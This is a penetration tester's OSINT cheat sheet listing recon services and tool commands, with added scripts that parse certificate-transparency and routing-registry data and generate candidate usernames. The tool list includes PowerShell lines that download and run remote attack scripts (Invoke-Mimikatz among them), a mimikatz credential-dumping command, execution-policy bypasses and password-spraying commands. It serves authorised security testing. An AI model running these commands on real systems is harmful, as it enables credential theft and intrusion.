Tactical OSINT For Pentesters: OSINT CheatSheet

Advanced Search
Google: site:target.com, inurl:target.com, filetype:pdf; operators AND, OR, - (exclude), "" (exact phrase)
Bing: ip:<ip_address>, feed:osint
Yandex: osint date=20140808..20140810, osint lang:en, osint mime:pdf
Reverse IP lookup: yougetsignal.com

Domain
Domain IP history: viewdns.info/iphistory/?domain=<domainname>
DNS records: mxtoolbox.com/SuperTool.aspx
nslookup: nslookup -type=any reconvillage.org
dig: dig reconvillage.org; dig reconvillage.org cname
Web technology profiling: browser add-ons (BuiltWith, Wappalyzer), job portals, forums (Stack Overflow, etc.)

SubDomain Search
DNS Dumpster: dnsdumpster.com
Wolfram Alpha: www.wolframalpha.com/input/?i=uber.com
Netcraft: searchdns.netcraft.com
Censys: censys.io/ipv4?q=uber.com
Shodan: www.shodan.io/search?query=uber.com
crt.sh: crt.sh/?q=%uber.com (append &output=json for machine-readable results)
sublist3r: $ python sublist3r.py -d uber.com -t 50 -b -p 80,443,21,22
massdns: $ massdns -r lists/resolvers.txt -t AAAA domains.txt
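The crt.sh query above returns one JSON object per certificate when &output=json is appended; the name_value field carries the SAN list, newline-separated, and often contains wildcard names, mixed case and look-alike domains that merely contain the target string. The script below is an added example (not part of the original cheat sheet) that turns that output into a deduplicated, in-scope host list. The records in SAMPLE_CRTSH_JSON are constructed to match the crt.sh shape, and the function names extract_subdomains and fetch_crtsh are this example's own.

```python
"""Extract in-scope subdomains from crt.sh JSON output.

Added example, not part of the original cheat sheet. crt.sh returns one JSON
object per certificate when queried as https://crt.sh/?q=%25.<domain>&output=json;
name_value holds the certificate's SAN list separated by newlines and may
contain wildcard names. SAMPLE_CRTSH_JSON is constructed to look like that
output; it was not fetched from crt.sh.
"""
import json
import re
import sys
import urllib.request
from collections import Counter

# Constructed sample records; only the fields this script reads are kept.
SAMPLE_CRTSH_JSON = json.dumps([
    {"id": 1, "common_name": "www.example.com",
     "name_value": "www.example.com\nexample.com"},
    {"id": 2, "common_name": "*.dev.example.com",
     "name_value": "*.dev.example.com\napi.dev.example.com"},
    {"id": 3, "common_name": "mail.example.com",
     "name_value": "MAIL.example.com\nmail.example.com\nautodiscover.example.com"},
    # Look-alike domain that merely contains the target string: must be dropped.
    {"id": 4, "common_name": "example.com.evil.net",
     "name_value": "example.com.evil.net"},
    {"id": 5, "common_name": "vpn.example.com",
     "name_value": "vpn.example.com\nvpn.example.com"},
])

HOSTNAME_RE = re.compile(r"^(?:\*\.)?(?:[a-z0-9-]+\.)+[a-z0-9-]+$")


def extract_subdomains(crtsh_json, domain):
    """Return (sorted hostnames under domain, Counter host -> certificate count,
    set of labels that appeared as wildcards).

    Names are lower-cased (SANs are case-insensitive), a leading "*." is
    stripped and recorded as a wildcard (a hint that brute-forcing under that
    label is worthwhile), and only names equal to domain or ending in
    "." + domain are kept, so look-alike domains are discarded.
    """
    domain = domain.lower().strip(".")
    cert_count = Counter()
    wildcards = set()
    for record in json.loads(crtsh_json):
        names_in_cert = set()
        for raw in record.get("name_value", "").split("\n"):
            name = raw.strip().lower()
            if not HOSTNAME_RE.match(name):
                continue
            if name.startswith("*."):
                name = name[2:]
                wildcards.add(name)
            if name == domain or name.endswith("." + domain):
                names_in_cert.add(name)
        for name in names_in_cert:          # count each certificate once per host
            cert_count[name] += 1
    return sorted(cert_count), cert_count, wildcards


def fetch_crtsh(domain):
    """Live query; same URL shape as the cheat sheet's crt.sh/?q=%<domain>."""
    url = "https://crt.sh/?q=%25." + domain + "&output=json"
    req = urllib.request.Request(url, headers={"User-Agent": "ct-subdomains/1.0"})
    with urllib.request.urlopen(req, timeout=60) as resp:
        return resp.read().decode("utf-8")


if __name__ == "__main__":
    # With no argument the constructed sample is used, so this runs offline.
    target = sys.argv[1] if len(sys.argv) > 1 else "example.com"
    data = fetch_crtsh(target) if len(sys.argv) > 1 else SAMPLE_CRTSH_JSON
    hosts, counts, wild = extract_subdomains(data, target)
    for host in hosts:
        flag = " (wildcard)" if host in wild else ""
        print(f"{counts[host]:4d}  {host}{flag}")
```

The certificate count per host is a useful prioritisation signal (a name that keeps getting re-issued certificates is probably alive), and the wildcard set tells you where sublist3r or massdns brute-forcing is worth the effort.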

Company Name
Zoominfo: zoominfo.com
Glassdoor: glassdoor.com
Hoovers: hoovers.com
Crunchbase: crunchbase.com

Email ID
Social profiles: dashboard.clearbit.com/lookup
Slides: www.slideshare.net/search/slideshow?q=<email_id>
Breach status: haveibeenpwned.com, publicdbhost.dmca.gripe, @dumpmon (twitter.com/dumpmon)
Source code aggregators: GitHub search, GitHub Gist search; if a site has no search of its own, use Google dorks, e.g. site:bitbucket.org intext:osint
Paste websites: pastebin.com, psbdmp.com, pastie.org, Google Custom Search Engine over paste sites (inteltechniques.com/osint/pastebins.html)
Email Sherlock: www.emailsherlock.com

Username
Tweets from a location: twimap.com
Check usernames: gaddr.me/search?type=profiles&q=upgoingstar
Facebook OSINT: inteltechniques.com/osint/facebook.html
Reddit OSINT: redditsearch.io, reditr.com, sleepingtime.org
Twitter OSINT: crowdriff.com/riffle/, tinfoleak.com
Verified information: keybase.io, Rapportive
People full name: advanced Google search operators on the name parts (ABC and XYZ stand in for the name parts on the sheet, e.g. "ABC XYZ" as an exact phrase)

IP Address
IP whois:
  $ whois -h whois.radb.net -T route <IP>
  $ whois -h whois.radb.net -- -i origin <ASN-ID> | grep -Eo "([0-9.]+){4}/[0-9]+" | sort -n | uniq -c
  (the grep only matches IPv4 route: objects; route6: objects need a separate pattern)
ASN ID:
  $ nmap --script targets-asn --script-args targets-asn.asn=<ASN-ID>
VirusTotal: virustotal.com
Robtex: robtex.com
ThreatIntel feeds: threatfeeds.io, thecyberthreat.com/cyber-threat-intelligence-feeds/
Shodan: shodan.io
Censys: censys.io
Zoomeye: zoomeye.org
SecurityTrails: securitytrails.com
Hurricane Electric BGP toolkit: bgp.he.net/dns/
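The whois -i origin one-liner above greps IPv4-looking strings out of the raw RADb reply, which misses route6: objects, picks up prefixes mentioned in free-text descr: fields, and lists the same route once per mirroring registry. The following is an added example (not part of the cheat sheet) that parses the RPSL objects instead and produces a deduplicated prefix list for an origin ASN. SAMPLE_WHOIS is constructed to look like RADb output using documentation-reserved ASNs and prefixes; the function names parse_rpsl, prefixes_for_origin and radb_query are this example's own.

```python
"""Turn RADb/IRR whois output for an origin ASN into a clean prefix list.

Added example, not from the cheat sheet. Instead of grepping, it parses the
RPSL objects returned by `whois -h whois.radb.net -- -i origin <ASN>`, so it
also collects route6: objects, ignores prefixes mentioned in descr:/remarks:
text, deduplicates objects mirrored from several registries, and can collapse
overlapping routes. SAMPLE_WHOIS is constructed (AS64496/AS64497 and the
prefixes are documentation-reserved values), not real registry data.
"""
import ipaddress
import subprocess
import sys

SAMPLE_WHOIS = """\
route:          203.0.113.0/24
descr:          Example Corp; legacy block 192.0.2.0/24 is no longer ours
origin:         AS64496
source:         RADB

route:          203.0.113.0/25
descr:          Example Corp DC1
origin:         AS64496
source:         RADB

route6:         2001:db8::/32
descr:          Example Corp v6
origin:         AS64496
source:         RADB

route:          203.0.113.0/24
descr:          same object mirrored from another registry
origin:         AS64496
source:         ALTDB

route:          198.51.100.0/24
descr:          Unrelated Corp
origin:         AS64497
source:         RADB
"""


def parse_rpsl(text):
    """Split RPSL text into objects (blank-line separated) as dicts of attr -> value."""
    objects, current, last_key = [], {}, None
    for line in text.splitlines():
        if not line.strip():
            if current:
                objects.append(current)
            current, last_key = {}, None
            continue
        if line[0] in " \t+":                      # continuation of the previous attribute
            if last_key is not None:
                current[last_key] += " " + line[1:].strip()
            continue
        key, _, value = line.partition(":")        # first colon only: route6 values contain ':'
        key = key.strip().lower()
        current.setdefault(key, value.strip())     # keep the first value of a repeated attr
        last_key = key
    if current:
        objects.append(current)
    return objects


def prefixes_for_origin(text, asn, collapse=False):
    """Return the prefixes registered with origin asn, IPv4 then IPv6, sorted.

    With collapse=True, more-specifics already covered by another route are
    merged (handy for scoping a scan); leave it False to see every object.
    """
    asn = asn.upper()
    if not asn.startswith("AS"):
        asn = "AS" + asn
    nets = set()                                   # set() removes mirrored duplicates
    for obj in parse_rpsl(text):
        if obj.get("origin", "").upper() != asn:
            continue
        for attr in ("route", "route6"):
            if attr in obj:
                nets.add(ipaddress.ip_network(obj[attr], strict=False))
    v4 = sorted(n for n in nets if n.version == 4)
    v6 = sorted(n for n in nets if n.version == 6)
    if collapse:
        v4 = list(ipaddress.collapse_addresses(v4))
        v6 = list(ipaddress.collapse_addresses(v6))
    return [str(n) for n in v4 + v6]


def radb_query(asn):
    """Run the same whois query the cheat sheet uses and return the raw reply."""
    cmd = ["whois", "-h", "whois.radb.net", "--", "-i", "origin", asn]
    return subprocess.run(cmd, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # usage: python radb_prefixes.py [AS64496] [--collapse]; no ASN -> offline sample
    args = [a for a in sys.argv[1:] if a != "--collapse"]
    asn = args[0] if args else "AS64496"
    raw = radb_query(asn) if args else SAMPLE_WHOIS
    for prefix in prefixes_for_origin(raw, asn, collapse="--collapse" in sys.argv):
        print(prefix)
```

Keep in mind that IRR data is self-declared by the announcing network, so a prefix registered under an ASN is an attribution hint to confirm against live BGP (bgp.he.net) rather than proof of ownership.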

Monitoring and Alerting
Social media monitor:
  $ tweetmonitor.py -k <keyword>
  $ tweetmonitor.py -k <keyword> -m <receiver_email>
Keyword-based alerts: Google Alerts
Web site changes: www.changedetection.com, follow.net, Page Monitor (Chrome extension), visualping.io
Tweetdeck: tweetdeck.twitter.com

Deep and Dark Web
The Hidden Wiki: hiddenwik55b36km.onion/index.php/Main_Page
Ahmia: ahmia.fi
Onion Cab: onion.cab/?a=search&q=<keyword>

Misc
Search results clustering engine: search.carrot2.org
Reverse image search: images.google.com, www.tineye.com
Extract info from public conferences: resources such as books, speakers, slide decks
Metasearch engine: www.polymeta.com
People search engines: pipl.com, Peekyou, Marketvisual
Social search engine: socialmention.com
Phone number search engine: Truecaller
Wayback Machine: archive.org
Computational knowledge engine: wolframalpha.com
OSINT mindmap: yoga.osint.ninja
OSINT Framework: osintframework.com
Public Telegram groups: tgstat.com
Semantic search: duckduckgo.com, kgine.com
Source code search engines: nerdydata.com, searchcode.com
Search engines for hackers: censys.io, shodan.io, zoomeye.org, fofa.so, onyphe.io, app.binaryedge.io, hunter.io, wigle.net, ghostproject.fr

Some services may require signup.


Tools
Generic help commands:
  $ ./exampletool -h
  $ ./exampletool --help
  $ python exampletool.py
  $ python3 exampletool.py
  $ sudo ./exampletool
List directory tree structure, two levels:
  $ tree -L 2
Find tools (using keyword):
  $ find . | grep <keyword> | head -n 1
Wordlists: /home/bhasia/Tools/Wordlists/
AWS CLI (set environment variables first):
  $ export AWS_ACCESS_KEY_ID=AKIAIOSXODNN7EXAMPLE
  $ export AWS_SECRET_ACCESS_KEY=wJaorXUrnWEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
  $ export AWS_DEFAULT_REGION=us-west-2
  $ aws help
GCP CLI:
  $ gcloud --help
Azure CLI:
  $ az
PowerShell (Windows):
  > powershell.exe
  Bypass execution policy:
  > powershell -ExecutionPolicy Bypass
  > powershell.exe -ep bypass
  > $Env:PSExecutionPolicyPreference = 'Bypass'
PowerShell (Linux):
  $ pwsh
ADRecon (PowerShell):
  > Import-Module .\ADRecon.ps1
aiodnsbrute:
  $ aiodnsbrute -w wordlist.txt -vv -t 1024 domain.com
altdns:
  $ ./altdns.py -i subdomains.txt -o data_output -w words.txt -r -s results_output.txt
Anubis:
  $ anubis -t reddit.com
AWSBucketDump:
  $ python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1
Belati:
  $ ./Belati.py --help
BlackWidow:
  $ sudo ./blackwidow -u https://target.com
brutespray:
  $ python brutespray.py --file nmap.gnmap -U userlist.txt -P passlist.txt --threads 5 --hosts 5
Bucket_Enumerator:
  $ python parse.py urls.txt
bucket_finder:
  $ ./bucket_finder.rb sample_wordlist
BurpSuite:
  $ java -jar burpsuite.jar
carrot2-workbench-3.16.1:
  $ ./carrot2-workbench
censys-enumeration:
  $ python censys_enumeration.py domains.txt
certgraph:
  $ certgraph -json yandex.com
CeWL:
  $ ./cewl.rb http://example.com
Chameleon:
  $ python chameleon.py --proxy a --check --domain example.com
changeme:
  $ ./changeme.py 192.168.10.0/24
CloudFail:
  $ python3 cloudfail.py --target example.com
CloudStorageFinder:
  $ ./bucket_finder.rb sample_list
  $ ./space_finder.rb sample_list
Cr3dOv3r:
  $ python3 Cr3d0v3r.py <email_id>
CrackMapExec (single-quote the password: in double quotes the shell expands $$ to its PID):
  $ crackmapexec 192.168.20.0/24 -u USERNAME -p 'P@$$w0rd'
create_bucket_patterns.py:
  $ python create_bucket_patterns.py KEYWORD
credmap:
  $ python credmap.py --email <email_id> --user testexample
CredSniper:
  $ ./install.sh
  $ python credsniper.py --help
ct-exposer:
  $ python3 ct-exposer.py -d yandex.com
datasploit:
  $ ./domainOsint.py example.com
  $ ./emailOsint.py <email_id>
dnscan:
  $ ./dnscan.py -d example.com
dns-parallel-prober:
  $ ./dns-queue.py example.com 100 output.txt -i subdomains-list.txt -f
dnsrecon:
  $ ./dnsrecon.py -d example.com
dnstwist:
  $ ./dnstwist.py example.com
domainhunter:
  $ python3 ./domainhunter.py -s example.com
email_pattern_generator.py:
  $ python email_pattern_generator.py John Doe example.com
enum4linux:
  $ enum4linux.pl -a 192.168.20.10
enumerate_tech.py (run find_http_https.py first):
  $ python enumerate_tech.py
exiftool:
  $ ./exiftool sample.jpg
EyeWitness:
  $ ./EyeWitness -f urls_list.txt --web
find_http_https.py:
  $ python find_http_https.py subdomains.txt
gasmask:
  $ python gasmask.py -d example.com -i basic
GCPBucketBrute:
  $ python3 gcpbucketbrute.py -k examplebucket -u
github-dorks:
  $ python github-dork.py -r redhuntlabs/RedHunt-OS
gitleaks:
  $ gitleaks -r https://github.com/redhuntlabs/RedHunt-OS
gitrob:
  $ export GITROB_ACCESS_TOKEN=testsampletestsampletestsampletestsample
  $ gitrob https://github.com/redhuntlabs/RedHunt-OS
gophish:
  $ ./gophish
  Visit: https://127.0.0.1:3333
Infoga:
  $ python infoga.py --domain example.com --source all --breach -v 2 --report example_output.txt
inSp3ctor:
  $ python inSp3ctor.py -n example
Inveigh (PowerShell):
  > IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1")
  > Invoke-Inveigh -ConsoleOutput Y
john:
  $ ./john password_hashes
LinEnum:
  $ ./LinEnum.sh
LinkedInt (add LinkedIn credentials and the Hunter.io API key in LinkedInt.py first):
  $ python LinkedInt.py
Maltego:
  $ maltego
masscan:
  $ masscan -p80,8000-8080 20.0.0.0/8
massdns:
  $ massdns -r lists/resolvers.txt -t AAAA -w results_file.txt domains_list.txt
metagoofil:
  $ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o applefiles -f results.html
MicroBurst (PowerShell):
  > IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Invoke-EnumerateAzureSubDomains.ps1")
  > Invoke-EnumerateAzureSubDomains -Base example -Verbose

mimikatz:
  > mimikatz.exe
  mimikatz # privilege::debug
  mimikatz # sekurlsa::logonPasswords full
pagodo:
  $ python3 ghdb_scraper.py -j -s
  $ python3 pagodo.py -g google_dorks_20190312_103108.txt -d example.com
password_gen:
  $ python passwordgen.py exampleuser
  $ python passwordgen_fromfile.py examplefile.txt
PDF-tools:
  $ python pdf-parser.py pdffile.pdf
PowerSploit (PowerShell):
  > IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
recon-ng (set API keys beforehand):
  $ ./recon-ng
robo3t:
  $ ./robo3t
ruler:
  $ ./ruler-linux32 --url http://autodiscover.example.com/autodiscover/autodiscover.xml brute --users users.txt --passwords password.txt
S3Scanner:
  $ python ./s3scanner.py names.txt
ScoutSuite:
  $ python Scout.py -h
set:
  $ sudo ./setoolkit
spaces-finder:
  $ python3 spaces_finder.py -l SpacesNames_list.txt -g interesting_keywords_list.txt -D -m 500000 -d 1 -t 5
spiderfoot:
  $ ./sf.py
  Visit http://127.0.0.1:5001
Spray (arguments: target, user list, password list, attempts per lockout period, lockout period in minutes, domain):
  $ spray.sh -smb 192.168.0.5 users.txt passwords.txt 1 35 InternalDomain
Sticky-Keys-Slayer:
  $ ./stickyKeysSlayer.sh -v 192.168.0.10
subbrute:
  $ ./subbrute.py -p example.com
Sublist3r:
  $ python sublist3r.py -d example.com
TekDefense-Automater:
  $ python Automater.py 8.8.8.8
theHarvester:
  $ ./theHarvester.py -d example.com
tinfoleak (configure Twitter auth keys in tinfoleak.conf):
  $ ./tinfoleak.py
TorBrowser:
  $ ./start-tor-browser.desktop
truffleHog:
  $ trufflehog --regex --entropy=False https://github.com/redhuntlabs/RedHunt-OS.git
Turbolist3r:
  $ python turbolist3r.py -d example.com
TweetMonitor (configure Twitter auth keys in tweetmonitor.py):
  $ python tweetmonitor.py -k osint
tweets_analyzer:
  $ ./tweets_analyzer.py -n sudhanshu_c
username-anarchy:
  $ ./username-anarchy john doe
webscreenshot:
  $ python webscreenshot.py -i url_list.txt
wordlists: common username, password and subdomain lists
WPForce:
  $ python wpforce.py -i usr.txt -w pass.txt -u "http://blog.example.com"
ZAP_2.7.0:
  $ ./zap.sh
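Two entries in the tool list, email_pattern_generator.py (John Doe example.com) and username-anarchy (john doe), exist to turn a name harvested from LinkedIn, Glassdoor or a conference slide deck into the handles that a mail server, Cr3dOv3r or a password spray can be tested against. The script below is an added example of that technique; it is not the code of either tool. It assumes nothing beyond the Python standard library, and the PATTERNS ordering and the function names normalize and name_patterns are this example's own.

```python
"""Generate candidate usernames / e-mail addresses from a person's full name.

Added example, not the cheat sheet's email_pattern_generator.py or
username-anarchy. Accented names are folded to ASCII (José -> jose), middle
names contribute an initial, and the list is deduplicated while preserving
order so the most common corporate formats come out first.
"""
import re
import sys
import unicodedata

# Ordered by how often each format shows up in corporate address books
# (an assumption from experience, not a measured ranking).
PATTERNS = (
    "{first}.{last}", "{first}{last}", "{first}_{last}", "{first}-{last}",
    "{fi}{last}", "{fi}.{last}", "{fi}_{last}",
    "{first}{li}", "{first}.{li}",
    "{last}{first}", "{last}.{first}", "{last}{fi}", "{last}.{fi}", "{li}{first}",
    "{fi}{mi}{last}", "{first}{mi}{last}", "{first}.{mi}.{last}",
    "{fi}{li}", "{first}", "{last}",
)


def normalize(token):
    """Fold to lowercase ASCII letters/digits: 'Álvarez-Cámara' -> 'alvarezcamara'."""
    decomposed = unicodedata.normalize("NFKD", token)
    ascii_only = "".join(c for c in decomposed if not unicodedata.combining(c))
    return re.sub(r"[^a-z0-9]", "", ascii_only.lower())


def name_patterns(full_name, domain=None):
    """Return candidate handles for full_name, as e-mail addresses if domain is given."""
    parts = [p for p in (normalize(t) for t in full_name.split()) if p]
    if len(parts) < 2:
        raise ValueError("need at least a first and a last name")
    first, last, middle = parts[0], parts[-1], parts[1:-1]
    fields = {
        "first": first, "last": last,
        "fi": first[0], "li": last[0],
        "mi": "".join(m[0] for m in middle),
    }
    seen, result = set(), []
    for pattern in PATTERNS:
        if "{mi}" in pattern and not middle:     # no middle name: skip initial-based forms
            continue
        candidate = pattern.format(**fields)
        if domain:
            candidate = f"{candidate}@{domain.lower()}"
        if candidate not in seen:                # e.g. jdoe can arise from two patterns
            seen.add(candidate)
            result.append(candidate)
    return result


if __name__ == "__main__":
    # usage: python name_patterns.py John Doe example.com   (domain is the last argument)
    if len(sys.argv) < 4:
        sys.exit("usage: name_patterns.py <first> [middle...] <last> <domain>")
    for handle in name_patterns(" ".join(sys.argv[1:-1]), sys.argv[-1]):
        print(handle)
```

Once one address for the organisation has been confirmed (a bounce, a breach dump entry, a hunter.io hit), keep only the pattern that matched and apply it to the rest of the harvested names rather than spraying every format, which keeps lockout counters and mail-server noise down.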
